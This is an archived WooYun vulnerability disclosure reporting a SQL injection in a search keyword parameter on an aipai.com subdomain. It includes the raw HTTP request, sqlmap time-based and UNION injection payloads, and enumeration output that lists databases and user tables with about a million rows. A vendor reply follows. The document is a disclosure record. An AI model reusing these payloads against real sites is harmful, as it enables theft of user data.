当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117907

漏洞标题:爱拍某处SQL注射影响百万用户信息

相关厂商:爱拍

漏洞作者: 路人甲

提交时间:2015-06-03 10:49

修复时间:2015-07-18 16:42

公开时间:2015-07-18 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

233

详细说明:

POST /get_Host_Games_ByKeyword HTTP/1.1
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: yxcz.aipai.com
Cookie: *************
Host: yxcz.aipai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
keyword=y
2,
http://yxcz.aipai.com/buy_game_list?keyword=wooyun
搜索的地方。。。。这个太操心了

漏洞证明:

---
Parameter: keyword (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: keyword=y' AND (SELECT * FROM (SELECT(SLEEP(5)))MKDc) AND 'pDKN'='p
DKN
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: keyword=y' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x78
6c775578634a447950,0x716a627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL--
---
[10:22:09] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.12
[10:22:09] [INFO] fetching database names
available databases [13]:
[*] db_fornalanweb
[*] db_fornalanweb_bak
[*] i3yx_core_db
[*] i3yx_core_db_bak
[*] i3yx_core_db_month
[*] i3yx_core_db_year
[*] i3yx_core_history
[*] i3yx_message
[*] i3yx_mobile_db
[*] i3yx_safety_db
[*] information_schema
[*] mysql
[*] test
+-----------+---------+
| Table | Entries |
+-----------+---------+
| user_user | 1056517 |
+-----------+---------+
+---------+---------+
| Table | Entries |
+---------+---------+
| jf_user | 205700 |
+---------+---------+

修复方案:

只求高 rank!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-03 16:40

厂商回复:

多谢反馈,这是挂在爱拍二级域名的合作方的数据库,已告知合作方。

最新状态:

暂无